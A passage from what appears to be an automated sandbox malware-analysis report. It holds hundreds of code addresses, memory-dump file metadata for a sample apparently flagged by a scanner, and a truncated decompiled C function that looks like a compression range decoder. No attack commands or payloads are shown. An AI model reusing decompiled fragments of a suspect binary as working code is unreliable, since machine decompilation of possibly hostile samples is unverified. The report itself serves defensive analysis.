                                                                                                                          0x00407447
                                                                                                                          0x00407447
                                                                                                                          0x00406be3
                                                                                                                          0x00406be3
                                                                                                                          0x00406be3
                                                                                                                          0x00406bec
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bf2
                                                                                                                          0x00000000
                                                                                                                          0x00406bfd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c06
                                                                                                                          0x00406c09
                                                                                                                          0x00406c0c
                                                                                                                          0x00406c10
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c16
                                                                                                                          0x00406c19
                                                                                                                          0x00406c1b
                                                                                                                          0x00406c1c
                                                                                                                          0x00406c1f
                                                                                                                          0x00406c21
                                                                                                                          0x00406c22
                                                                                                                          0x00406c24
                                                                                                                          0x00406c27
                                                                                                                          0x00406c2c
                                                                                                                          0x00406c31
                                                                                                                          0x00406c3a
                                                                                                                          0x00406c4d
                                                                                                                          0x00406c50
                                                                                                                          0x00406c5c
                                                                                                                          0x00406c84
                                                                                                                          0x00406c86
                                                                                                                          0x00406c94
                                                                                                                          0x00406c94
                                                                                                                          0x00406c98
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406c88
                                                                                                                          0x00406c88
                                                                                                                          0x00406c8b
                                                                                                                          0x00406c8c
                                                                                                                          0x00406c8c
                                                                                                                          0x00000000
                                                                                                                          0x00406c88
                                                                                                                          0x00406c62
                                                                                                                          0x00406c67
                                                                                                                          0x00406c67
                                                                                                                          0x00406c70
                                                                                                                          0x00406c78
                                                                                                                          0x00406c7b
                                                                                                                          0x00000000
                                                                                                                          0x00406c81
                                                                                                                          0x00406c81
                                                                                                                          0x00000000
                                                                                                                          0x00406c81
                                                                                                                          0x00000000
                                                                                                                          0x00406c9e
                                                                                                                          0x00406c9e
                                                                                                                          0x00406ca2
                                                                                                                          0x0040754e
                                                                                                                          0x00000000
                                                                                                                          0x0040754e
                                                                                                                          0x00406cab
                                                                                                                          0x00406cbb
                                                                                                                          0x00406cbe
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc1
                                                                                                                          0x00406cc4
                                                                                                                          0x00406cc8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406cca
                                                                                                                          0x00406cd0
                                                                                                                          0x00406cfa
                                                                                                                          0x00406d00
                                                                                                                          0x00406d07
                                                                                                                          0x00000000
                                                                                                                          0x00406d07
                                                                                                                          0x00406cd6
                                                                                                                          0x00406cd9
                                                                                                                          0x00406cde
                                                                                                                          0x00406cde
                                                                                                                          0x00406ce9
                                                                                                                          0x00406cf1
                                                                                                                          0x00406cf4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406d39
                                                                                                                          0x00406d3f
                                                                                                                          0x00406d42
                                                                                                                          0x00406d4f
                                                                                                                          0x00406d57
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406d0e
                                                                                                                          0x00406d0e
                                                                                                                          0x00406d12
                                                                                                                          0x0040755d
                                                                                                                          0x00000000
                                                                                                                          0x0040755d
                                                                                                                          0x00406d1e
                                                                                                                          0x00406d29
                                                                                                                          0x00406d29
                                                                                                                          0x00406d29
                                                                                                                          0x00406d2c
                                                                                                                          0x00406d2f
                                                                                                                          0x00406d32
                                                                                                                          0x00406d37
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004073ce
                                                                                                                          0x004073ce
                                                                                                                          0x004073d4
                                                                                                                          0x004073da
                                                                                                                          0x004073e0
                                                                                                                          0x004073fa
                                                                                                                          0x004073fd
                                                                                                                          0x00407403
                                                                                                                          0x0040740e
                                                                                                                          0x0040740e
                                                                                                                          0x00407410
                                                                                                                          0x004073e2
                                                                                                                          0x004073e2
                                                                                                                          0x004073f1
                                                                                                                          0x004073f5
                                                                                                                          0x004073f5
                                                                                                                          0x0040741a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040741c
                                                                                                                          0x00407420
                                                                                                                          0x004075cf
                                                                                                                          0x00000000
                                                                                                                          0x004075cf
                                                                                                                          0x0040742c
                                                                                                                          0x00407433
                                                                                                                          0x0040743b
                                                                                                                          0x0040743e
                                                                                                                          0x00407441
                                                                                                                          0x00407441
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406d5f
                                                                                                                          0x00406d61
                                                                                                                          0x00406d64
                                                                                                                          0x00406dd5
                                                                                                                          0x00406dd8
                                                                                                                          0x00406ddb
                                                                                                                          0x00406de2
                                                                                                                          0x00406dec
                                                                                                                          0x00000000
                                                                                                                          0x00406dec
                                                                                                                          0x00406d66
                                                                                                                          0x00406d6a
                                                                                                                          0x00406d6d
                                                                                                                          0x00406d6f
                                                                                                                          0x00406d72
                                                                                                                          0x00406d75
                                                                                                                          0x00406d77
                                                                                                                          0x00406d7a
                                                                                                                          0x00406d7c
                                                                                                                          0x00406d81
                                                                                                                          0x00406d84
                                                                                                                          0x00406d87
                                                                                                                          0x00406d8b
                                                                                                                          0x00406d92
                                                                                                                          0x00406d95
                                                                                                                          0x00406d9c
                                                                                                                          0x00406da0
                                                                                                                          0x00406da8
                                                                                                                          0x00406da8
                                                                                                                          0x00406da8
                                                                                                                          0x00406da2
                                                                                                                          0x00406da2
                                                                                                                          0x00406da2
                                                                                                                          0x00406d97
                                                                                                                          0x00406d97
                                                                                                                          0x00406d97
                                                                                                                          0x00406dac
                                                                                                                          0x00406daf
                                                                                                                          0x00406dcd
                                                                                                                          0x00406dcf
                                                                                                                          0x00000000
                                                                                                                          0x00406db1
                                                                                                                          0x00406db1
                                                                                                                          0x00406db4
                                                                                                                          0x00406db7
                                                                                                                          0x00406dba
                                                                                                                          0x00406dbc
                                                                                                                          0x00406dbc
                                                                                                                          0x00406dbc
                                                                                                                          0x00406dbf
                                                                                                                          0x00406dc2
                                                                                                                          0x00406dc4
                                                                                                                          0x00406dc5
                                                                                                                          0x00406dc8
                                                                                                                          0x00000000
                                                                                                                          0x00406dc8
                                                                                                                          0x00000000
                                                                                                                          0x00406ffe
                                                                                                                          0x00407002
                                                                                                                          0x00407020
                                                                                                                          0x00407023
                                                                                                                          0x0040702a
                                                                                                                          0x0040702d
                                                                                                                          0x00407030
                                                                                                                          0x00407033
                                                                                                                          0x00407036
                                                                                                                          0x00407039
                                                                                                                          0x0040703b
                                                                                                                          0x00407042
                                                                                                                          0x00407043
                                                                                                                          0x00407045
                                                                                                                          0x00407048
                                                                                                                          0x0040704b
                                                                                                                          0x0040704e
                                                                                                                          0x0040704e
                                                                                                                          0x00407053
                                                                                                                          0x00000000
                                                                                                                          0x00407053
                                                                                                                          0x00407004
                                                                                                                          0x00407007
                                                                                                                          0x0040700a
                                                                                                                          0x00407014
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407068
                                                                                                                          0x0040706c
                                                                                                                          0x0040708f
                                                                                                                          0x00407092
                                                                                                                          0x00407095
                                                                                                                          0x0040709f
                                                                                                                          0x0040706e
                                                                                                                          0x0040706e
                                                                                                                          0x00407071
                                                                                                                          0x00407074
                                                                                                                          0x00407077
                                                                                                                          0x00407084
                                                                                                                          0x00407087
                                                                                                                          0x00407087
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070ab
                                                                                                                          0x004070af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070b5
                                                                                                                          0x004070b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070bf
                                                                                                                          0x004070c1
                                                                                                                          0x004070c5
                                                                                                                          0x004070c5
                                                                                                                          0x004070c8
                                                                                                                          0x004070cc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040711c
                                                                                                                          0x00407120
                                                                                                                          0x00407127
                                                                                                                          0x0040712a
                                                                                                                          0x0040712d
                                                                                                                          0x00407137
                                                                                                                          0x00000000
                                                                                                                          0x00407137
                                                                                                                          0x00407122
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407143
                                                                                                                          0x00407147
                                                                                                                          0x0040714e
                                                                                                                          0x00407151
                                                                                                                          0x00407154
                                                                                                                          0x00407149
                                                                                                                          0x00407149
                                                                                                                          0x00407149
                                                                                                                          0x00407157
                                                                                                                          0x0040715a
                                                                                                                          0x0040715d
                                                                                                                          0x0040715d
                                                                                                                          0x00407160
                                                                                                                          0x00407163
                                                                                                                          0x00407166
                                                                                                                          0x00407166
                                                                                                                          0x00407169
                                                                                                                          0x00407170
                                                                                                                          0x00407175
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407203
                                                                                                                          0x00407203
                                                                                                                          0x00407207
                                                                                                                          0x004075a5
                                                                                                                          0x00000000
                                                                                                                          0x004075a5
                                                                                                                          0x0040720d
                                                                                                                          0x00407210
                                                                                                                          0x00407213
                                                                                                                          0x00407217
                                                                                                                          0x0040721a
                                                                                                                          0x00407220
                                                                                                                          0x00407222
                                                                                                                          0x00407222
                                                                                                                          0x00407222
                                                                                                                          0x00407225
                                                                                                                          0x00407228
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406df8
                                                                                                                          0x00406df8
                                                                                                                          0x00406dfc
                                                                                                                          0x00407569
                                                                                                                          0x00000000
                                                                                                                          0x00407569
                                                                                                                          0x00406e02
                                                                                                                          0x00406e05
                                                                                                                          0x00406e08
                                                                                                                          0x00406e0c
                                                                                                                          0x00406e0f
                                                                                                                          0x00406e15
                                                                                                                          0x00406e17
                                                                                                                          0x00406e17
                                                                                                                          0x00406e17
                                                                                                                          0x00406e1a
                                                                                                                          0x00406e1d
                                                                                                                          0x00406e1d
                                                                                                                          0x00406e20
                                                                                                                          0x00406e23
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406e29
                                                                                                                          0x00406e2f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406e35
                                                                                                                          0x00406e35
                                                                                                                          0x00406e39
                                                                                                                          0x00406e3c
                                                                                                                          0x00406e3f
                                                                                                                          0x00406e42
                                                                                                                          0x00406e45
                                                                                                                          0x00406e46
                                                                                                                          0x00406e49
                                                                                                                          0x00406e4b
                                                                                                                          0x00406e51
                                                                                                                          0x00406e54
                                                                                                                          0x00406e57
                                                                                                                          0x00406e5a
                                                                                                                          0x00406e5d
                                                                                                                          0x00406e60
                                                                                                                          0x00406e63
                                                                                                                          0x00406e7f
                                                                                                                          0x00406e82
                                                                                                                          0x00406e85
                                                                                                                          0x00406e88
                                                                                                                          0x00406e8f
                                                                                                                          0x00406e93
                                                                                                                          0x00406e95
                                                                                                                          0x00406e99
                                                                                                                          0x00406e65
                                                                                                                          0x00406e65
                                                                                                                          0x00406e69
                                                                                                                          0x00406e71
                                                                                                                          0x00406e76
                                                                                                                          0x00406e78
                                                                                                                          0x00406e7a
                                                                                                                          0x00406e7a
                                                                                                                          0x00406e9c
                                                                                                                          0x00406ea3
                                                                                                                          0x00406ea6
                                                                                                                          0x00000000
                                                                                                                          0x00406eac
                                                                                                                          0x00000000
                                                                                                                          0x00406eac
                                                                                                                          0x00000000
                                                                                                                          0x00406eb1
                                                                                                                          0x00406eb1
                                                                                                                          0x00406eb5
                                                                                                                          0x00407575
                                                                                                                          0x00000000
                                                                                                                          0x00407575
                                                                                                                          0x00406ebb
                                                                                                                          0x00406ebe
                                                                                                                          0x00406ec1
                                                                                                                          0x00406ec5
                                                                                                                          0x00406ec8
                                                                                                                          0x00406ece
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed0
                                                                                                                          0x00406ed3
                                                                                                                          0x00406ed6
                                                                                                                          0x00406ed6
                                                                                                                          0x00406ed6
                                                                                                                          0x00406edc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406ede
                                                                                                                          0x00406ee1
                                                                                                                          0x00406ee4
                                                                                                                          0x00406ee7
                                                                                                                          0x00406eea
                                                                                                                          0x00406eed
                                                                                                                          0x00406ef0
                                                                                                                          0x00406ef3
                                                                                                                          0x00406ef6
                                                                                                                          0x00406ef9
                                                                                                                          0x00406efc
                                                                                                                          0x00406f14
                                                                                                                          0x00406f17
                                                                                                                          0x00406f1a
                                                                                                                          0x00406f1d
                                                                                                                          0x00406f1d
                                                                                                                          0x00406f20
                                                                                                                          0x00406f24
                                                                                                                          0x00406f26
                                                                                                                          0x00406efe
                                                                                                                          0x00406efe
                                                                                                                          0x00406f06
                                                                                                                          0x00406f0b
                                                                                                                          0x00406f0d
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f29
                                                                                                                          0x00406f30
                                                                                                                          0x00406f33
                                                                                                                          0x00000000
                                                                                                                          0x00406f35
                                                                                                                          0x00000000
                                                                                                                          0x00406f35
                                                                                                                          0x00406f33
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f75
                                                                                                                          0x00406f75
                                                                                                                          0x00406f79
                                                                                                                          0x00407581
                                                                                                                          0x00000000
                                                                                                                          0x00407581
                                                                                                                          0x00406f7f
                                                                                                                          0x00406f82
                                                                                                                          0x00406f85
                                                                                                                          0x00406f89
                                                                                                                          0x00406f8c
                                                                                                                          0x00406f92
                                                                                                                          0x00406f94
                                                                                                                          0x00406f94
                                                                                                                          0x00406f94
                                                                                                                          0x00406f97
                                                                                                                          0x00406f9a
                                                                                                                          0x00406f9a
                                                                                                                          0x00406fa0
                                                                                                                          0x00406f3e
                                                                                                                          0x00406f3e
                                                                                                                          0x00406f41
                                                                                                                          0x00000000
                                                                                                                          0x00406f41
                                                                                                                          0x00406fa2
                                                                                                                          0x00406fa2
                                                                                                                          0x00406fa5
                                                                                                                          0x00406fa8
                                                                                                                          0x00406fab
                                                                                                                          0x00406fae
                                                                                                                          0x00406fb1
                                                                                                                          0x00406fb4
                                                                                                                          0x00406fb7
                                                                                                                          0x00406fba
                                                                                                                          0x00406fbd
                                                                                                                          0x00406fc0
                                                                                                                          0x00406fd8
                                                                                                                          0x00406fdb
                                                                                                                          0x00406fde
                                                                                                                          0x00406fe1
                                                                                                                          0x00406fe1
                                                                                                                          0x00406fe4
                                                                                                                          0x00406fe8
                                                                                                                          0x00406fea
                                                                                                                          0x00406fc2
                                                                                                                          0x00406fc2
                                                                                                                          0x00406fca
                                                                                                                          0x00406fcf
                                                                                                                          0x00406fd1
                                                                                                                          0x00406fd3
                                                                                                                          0x00406fd3
                                                                                                                          0x00406fed
                                                                                                                          0x00406ff4
                                                                                                                          0x00406ff7
                                                                                                                          0x00000000
                                                                                                                          0x00406ff9
                                                                                                                          0x00000000
                                                                                                                          0x00406ff9
                                                                                                                          0x00000000
                                                                                                                          0x00407286
                                                                                                                          0x00407286
                                                                                                                          0x0040728a
                                                                                                                          0x004075b1
                                                                                                                          0x00000000
                                                                                                                          0x004075b1
                                                                                                                          0x00407290
                                                                                                                          0x00407293
                                                                                                                          0x00407296
                                                                                                                          0x0040729a
                                                                                                                          0x0040729d
                                                                                                                          0x004072a3
                                                                                                                          0x004072a5
                                                                                                                          0x004072a5
                                                                                                                          0x004072a5
                                                                                                                          0x004072a8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407056
                                                                                                                          0x00407056
                                                                                                                          0x00407059
                                                                                                                          0x004073cb
                                                                                                                          0x004073cb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407452
                                                                                                                          0x00407456
                                                                                                                          0x00407474
                                                                                                                          0x00407474
                                                                                                                          0x00407474
                                                                                                                          0x0040747b
                                                                                                                          0x00407482
                                                                                                                          0x00000000
                                                                                                                          0x00407482
                                                                                                                          0x00407458
                                                                                                                          0x0040745b
                                                                                                                          0x0040745e
                                                                                                                          0x00407461
                                                                                                                          0x00407468
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407543
                                                                                                                          0x00407546
                                                                                                                          0x00407447
                                                                                                                          0x00407447
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040717d
                                                                                                                          0x0040717f
                                                                                                                          0x00407186
                                                                                                                          0x00407187
                                                                                                                          0x00407189
                                                                                                                          0x0040718c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407194
                                                                                                                          0x00407197
                                                                                                                          0x0040719a
                                                                                                                          0x0040719c
                                                                                                                          0x0040719e
                                                                                                                          0x0040719e
                                                                                                                          0x0040719f
                                                                                                                          0x004071a2
                                                                                                                          0x004071a9
                                                                                                                          0x004071ac
                                                                                                                          0x004071ba
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040749f
                                                                                                                          0x0040749f
                                                                                                                          0x004074a3
                                                                                                                          0x004075db
                                                                                                                          0x00000000
                                                                                                                          0x004075db
                                                                                                                          0x004074a9
                                                                                                                          0x004074ac
                                                                                                                          0x004074af
                                                                                                                          0x004074b3
                                                                                                                          0x004074b6
                                                                                                                          0x004074bc
                                                                                                                          0x004074be
                                                                                                                          0x004074be
                                                                                                                          0x004074be
                                                                                                                          0x004074c1
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004071c2
                                                                                                                          0x004071c5
                                                                                                                          0x004071fb
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732e
                                                                                                                          0x0040732e
                                                                                                                          0x00407331
                                                                                                                          0x00407333
                                                                                                                          0x004075bd
                                                                                                                          0x00000000
                                                                                                                          0x004075bd
                                                                                                                          0x00407339
                                                                                                                          0x0040733c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407342
                                                                                                                          0x00407346
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00000000
                                                                                                                          0x00407349
                                                                                                                          0x004071c7
                                                                                                                          0x004071c9
                                                                                                                          0x004071cb
                                                                                                                          0x004071cd
                                                                                                                          0x004071d0
                                                                                                                          0x004071d1
                                                                                                                          0x004071d3
                                                                                                                          0x004071d5
                                                                                                                          0x004071d8
                                                                                                                          0x004071db
                                                                                                                          0x004071f1
                                                                                                                          0x004071f6
                                                                                                                          0x0040722e
                                                                                                                          0x0040722e
                                                                                                                          0x00407232
                                                                                                                          0x0040725e
                                                                                                                          0x00407260
                                                                                                                          0x00407267
                                                                                                                          0x0040726a
                                                                                                                          0x0040726d
                                                                                                                          0x0040726d
                                                                                                                          0x00407272
                                                                                                                          0x00407272
                                                                                                                          0x00407274
                                                                                                                          0x00407277
                                                                                                                          0x0040727e
                                                                                                                          0x00407281
                                                                                                                          0x004072ae
                                                                                                                          0x004072ae
                                                                                                                          0x004072b1
                                                                                                                          0x004072b4
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00000000
                                                                                                                          0x00407328
                                                                                                                          0x004072b6
                                                                                                                          0x004072bc
                                                                                                                          0x004072bf
                                                                                                                          0x004072c2
                                                                                                                          0x004072c5
                                                                                                                          0x004072c8
                                                                                                                          0x004072cb
                                                                                                                          0x004072ce
                                                                                                                          0x004072d1
                                                                                                                          0x004072d4
                                                                                                                          0x004072d7
                                                                                                                          0x004072f0
                                                                                                                          0x004072f2
                                                                                                                          0x004072f5
                                                                                                                          0x004072f6
                                                                                                                          0x004072f9
                                                                                                                          0x004072fb
                                                                                                                          0x004072fe
                                                                                                                          0x00407300
                                                                                                                          0x00407302
                                                                                                                          0x00407305
                                                                                                                          0x00407307
                                                                                                                          0x0040730a
                                                                                                                          0x0040730e
                                                                                                                          0x00407310
                                                                                                                          0x00407310
                                                                                                                          0x00407311
                                                                                                                          0x00407314
                                                                                                                          0x00407317
                                                                                                                          0x004072d9
                                                                                                                          0x004072d9
                                                                                                                          0x004072e1
                                                                                                                          0x004072e6
                                                                                                                          0x004072e8
                                                                                                                          0x004072eb
                                                                                                                          0x004072eb
                                                                                                                          0x0040731a
                                                                                                                          0x00407321
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00407321
                                                                                                                          0x00407234
                                                                                                                          0x00407237
                                                                                                                          0x00407239
                                                                                                                          0x0040723c
                                                                                                                          0x0040723f
                                                                                                                          0x00407242
                                                                                                                          0x00407244
                                                                                                                          0x00407247
                                                                                                                          0x0040724a
                                                                                                                          0x0040724a
                                                                                                                          0x0040724d
                                                                                                                          0x0040724d
                                                                                                                          0x00407250
                                                                                                                          0x00407257
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00407257
                                                                                                                          0x004071dd
                                                                                                                          0x004071e0
                                                                                                                          0x004071e2
                                                                                                                          0x004071e5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f44
                                                                                                                          0x00406f44
                                                                                                                          0x00406f48
                                                                                                                          0x0040758d
                                                                                                                          0x00000000
                                                                                                                          0x0040758d
                                                                                                                          0x00406f4e
                                                                                                                          0x00406f51
                                                                                                                          0x00406f54
                                                                                                                          0x00406f57
                                                                                                                          0x00406f5a
                                                                                                                          0x00406f5d
                                                                                                                          0x00406f60
                                                                                                                          0x00406f62
                                                                                                                          0x00406f65
                                                                                                                          0x00406f68
                                                                                                                          0x00406f6b
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004070cf
                                                                                                                          0x004070cf
                                                                                                                          0x004070d3
                                                                                                                          0x00407599
                                                                                                                          0x00000000
                                                                                                                          0x00407599
                                                                                                                          0x004070d9
                                                                                                                          0x004070dc
                                                                                                                          0x004070df
                                                                                                                          0x004070e2
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e4
                                                                                                                          0x004070e7
                                                                                                                          0x004070ea
                                                                                                                          0x004070ed
                                                                                                                          0x004070f0
                                                                                                                          0x004070f3
                                                                                                                          0x004070f6
                                                                                                                          0x004070f7
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070f9
                                                                                                                          0x004070fc
                                                                                                                          0x004070ff
                                                                                                                          0x00407102
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407105
                                                                                                                          0x00407108
                                                                                                                          0x0040710a
                                                                                                                          0x0040710a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x00407350
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407356
                                                                                                                          0x00407359
                                                                                                                          0x0040735c
                                                                                                                          0x0040735f
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407364
                                                                                                                          0x00407367
                                                                                                                          0x0040736a
                                                                                                                          0x0040736d
                                                                                                                          0x00407370
                                                                                                                          0x00407373
                                                                                                                          0x00407374
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407379
                                                                                                                          0x0040737c
                                                                                                                          0x0040737f
                                                                                                                          0x00407382
                                                                                                                          0x00407385
                                                                                                                          0x00407389
                                                                                                                          0x0040738b
                                                                                                                          0x0040738e
                                                                                                                          0x00000000
                                                                                                                          0x00407390
                                                                                                                          0x0040710d
                                                                                                                          0x0040710d
                                                                                                                          0x00000000
                                                                                                                          0x0040710d
                                                                                                                          0x0040738e
                                                                                                                          0x004075c3
                                                                                                                          0x004075e5
                                                                                                                          0x004075eb
                                                                                                                          0x004075ed
                                                                                                                          0x004075f4
                                                                                                                          0x004075f6
                                                                                                                          0x004075fd
                                                                                                                          0x00407601
                                                                                                                          0x00000000
                                                                                                                          0x00406bf2
                                                                                                                          0x004075fa
                                                                                                                          0x004075fa
                                                                                                                          0x00000000
                                                                                                                          0x004075fa
                                                                                                                          0x00407447
                                                                                                                          0x004074cd
                                                                                                                          0x004074d3
                                                                                                                          0x004074d6
                                                                                                                          0x004074d9
                                                                                                                          0x004074dc
                                                                                                                          0x004074df
                                                                                                                          0x004074e2
                                                                                                                          0x004074e5
                                                                                                                          0x004074e8
                                                                                                                          0x004074ee
                                                                                                                          0x00407507
                                                                                                                          0x0040750a
                                                                                                                          0x0040750d
                                                                                                                          0x00407510
                                                                                                                          0x00407514
                                                                                                                          0x00407516
                                                                                                                          0x00407517
                                                                                                                          0x0040751a
                                                                                                                          0x004074f0
                                                                                                                          0x004074f0
                                                                                                                          0x004074f8
                                                                                                                          0x004074fd
                                                                                                                          0x004074ff
                                                                                                                          0x00407502
                                                                                                                          0x00407502
                                                                                                                          0x00407524
                                                                                                                          0x00000000
                                                                                                                          0x00407526
                                                                                                                          0x00000000
                                                                                                                          0x00407526
                                                                                                                          0x00407524
                                                                                                                          0x00000000
                                                                                                                          0x00407399

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                                                          • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                                                          • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                                                          • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004070AB() {
                                                                                                                          				unsigned short _t532;
                                                                                                                          				signed int _t533;
                                                                                                                          				void _t534;
                                                                                                                          				void* _t535;
                                                                                                                          				signed int _t536;
                                                                                                                          				signed int _t565;
                                                                                                                          				signed int _t568;
                                                                                                                          				signed int _t589;
                                                                                                                          				signed int* _t606;
                                                                                                                          				void* _t613;
                                                                                                                          
                                                                                                                          				L0:
                                                                                                                          				while(1) {
                                                                                                                          					L0:
                                                                                                                          					if( *(_t613 - 0x40) != 0) {
                                                                                                                          						L89:
                                                                                                                          						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                                                          						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                                                          						L69:
                                                                                                                          						_t606 =  *(_t613 - 0x58);
                                                                                                                          						 *(_t613 - 0x84) = 0x12;
                                                                                                                          						L132:
                                                                                                                          						 *(_t613 - 0x54) = _t606;
                                                                                                                          						L133:
                                                                                                                          						_t532 =  *_t606;
                                                                                                                          						_t589 = _t532 & 0x0000ffff;
                                                                                                                          						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                          						if( *(_t613 - 0xc) >= _t565) {
                                                                                                                          							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                          							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                          							 *(_t613 - 0x40) = 1;
                                                                                                                          							_t533 = _t532 - (_t532 >> 5);
                                                                                                                          							 *_t606 = _t533;
                                                                                                                          						} else {
                                                                                                                          							 *(_t613 - 0x10) = _t565;
                                                                                                                          							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                          							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                                                          						}
                                                                                                                          						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                          							L139:
